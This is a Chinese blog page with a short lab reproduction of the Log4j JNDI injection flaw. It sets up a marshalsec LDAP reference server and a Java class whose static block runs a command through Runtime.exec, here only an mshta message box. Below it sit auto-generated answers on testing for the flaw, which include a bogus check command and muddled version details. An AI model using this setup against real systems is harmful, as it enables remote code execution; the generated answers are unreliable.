log4j漏洞,jndi侵入验证复现

log4j的1.14.1往下版本

需要先搭建一个LDAP服务器,git地址

git clone https://github.com/mbechler/marshalsec.git

执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令

"http://127.0.0.1/fileService/download/1/1/#test" 8888

 意思是将文件服务器http://127.0.0.1/fileService/download/1/1/下面的test类,映射到8888端口

然后编写test类

public class test {
    static{
        try {
            Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4进来了\",64,\"来自熊猫头的消息\")(window.close)");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

test类执行了一个cmd指令,执行了一段vb程序语句

将他编译成class,放到文件服

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: log4j漏洞是指Apache Log4j 2.x版本中的一个严重安全漏洞(CVE-2021-44228),攻击者可以利用该漏洞在受影响的应用程序中执行任意代码,导致系统被入侵、数据泄露等问题。为了测试是否受到该漏洞的影响,可以按照以下步骤进行测试: 1. 确认应用程序使用了Log4j 2.x版本,可以在应用程序的pom.xml或gradle文件中查看相关依赖。 2. 使用以下命令检查是否受到漏洞影响: ``` java -jar log4j-core-2.16.0.jar "dns:[YOUR_DOMAIN_NAME]" -t ``` 其中,将 "dns:[YOUR_DOMAIN_NAME]" 替换为你的域名。如果应用程序受到漏洞影响,会返回一串类似于以下的信息: ``` 2021-12-09 11:54:45,784 main ERROR Unable to invoke factory method in class class org.apache.logging.log4j.core.appender.SocketAppender for element Socket. java.lang.IllegalArgumentException: hostname can't be null ``` 3. 如果测试结果表明应用程序受到漏洞影响,需要及时升级Log4j版本,可以升级到2.16.0及以上版本,或者安装补丁程序进行修。 4. 在升级或修之前,可以采取临时措施来缓解漏洞影响,例如在应用程序的配置文件中添加以下内容: ``` log4j2.formatMsgNoLookups=true ``` 这个设置将禁止Log4j使用JNDI和相关的Lookups功能,可以避免漏洞被利用。 总之,及时升级Log4j版本是防范该漏洞的最好方法。在升级之前,需要进行测试以确保应用程序是否受到漏洞影响。 ### 回答2: log4j漏洞测试步骤主要包括以下几个方面: 1. 确认应用是否使用log4j:首先,需要确认应用程序是否使用了log4j作为日志记录工具。可以查看应用程序的配置文件、代码库或者查找特定的log4j依赖包以确认。 2. 判断应用程序是否受到漏洞的影响:根据所使用的log4j版本,判断应用程序是否受到漏洞的影响。可以查看log4j的版本号以及是否包含漏洞的补丁。 3. 模拟攻击向量进行测试:通过构造恶意的日志记录,例如含有特殊的JNDI注入代码或者远程代码执行代码的日志信息,然后观察应用程序的日志记录文件是否产生了相应的远程连接或者执行迹象来判断应用程序是否受到漏洞的影响。 4. 检测应用程序的安全措施:测试应用程序的防御措施,例如应用程序是否进行了日志记录的合理限制,以及是否禁止了远程日志记录功能等。 5. 进行漏洞并进行测试:如果应用程序受到log4j漏洞的影响,建议及时更新至最新版本的log4j,并对修后的应用程序进行重新测试,确认漏洞是否已成功修。 需要注意的是,在进行log4j漏洞测试时,应确保在合适的测试环境下进行,避免对生产环境或者正式运行的应用程序造成不必要的损失。同时,建议遵循合规和法规要求,避免违规的安全测试行为。 ### 回答3: log4j漏洞测试是为了检测和验证系统中是否存在log4j漏洞,以下是一种常见的log4j漏洞测试步骤: 1. 查看系统中是否使用了log4j:首先,我们需要确认系统是否使用了log4j作为日志记录框架。可以查看系统代码或者依赖项中是否有log4j的相关信息。 2. 确认log4j版本:确定系统中使用的log4j版本,因为漏洞主要存在于log4j 2.x的版本中。可以检查相关代码或者依赖项的pom.xml文件中是否包含log4j的版本信息。 3. 下载并编译恶意代码:根据确认的log4j版本,从官方或者其他可信源下载相应版本的log4j漏洞代码。然后通过编译将恶意代码生成可执行的payload。 4. 部署恶意代码:将生成的恶意代码部署到目标系统中,可以是通过常规的软件部署方法,也可以通过代码注入等方式。 5. 触发恶意代码:根据恶意代码的具体设计和用途,触发恶意代码的执行。可以通过发送特定请求、调用特定接口或者模拟用户操作等方式触发。 6. 监测日志记录行为:观察系统的日志记录行为,包括日志文件的生成、内容的变化等。查看是否有漏洞利用的迹象,如恶意请求被记录等。 7. 上报并修漏洞:一旦发系统受到log4j漏洞的影响,应立即上报给相关安全人员,并尽快采取修措施,如升级log4j到最新版本、修改配置文件等。 需要注意的是,测试时应遵守法律法规和组织规定,合法授权并仔细评估测试的风险和影响。此外,建议在测试之前先创建备份,并在安全环境中进行测试以减少风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值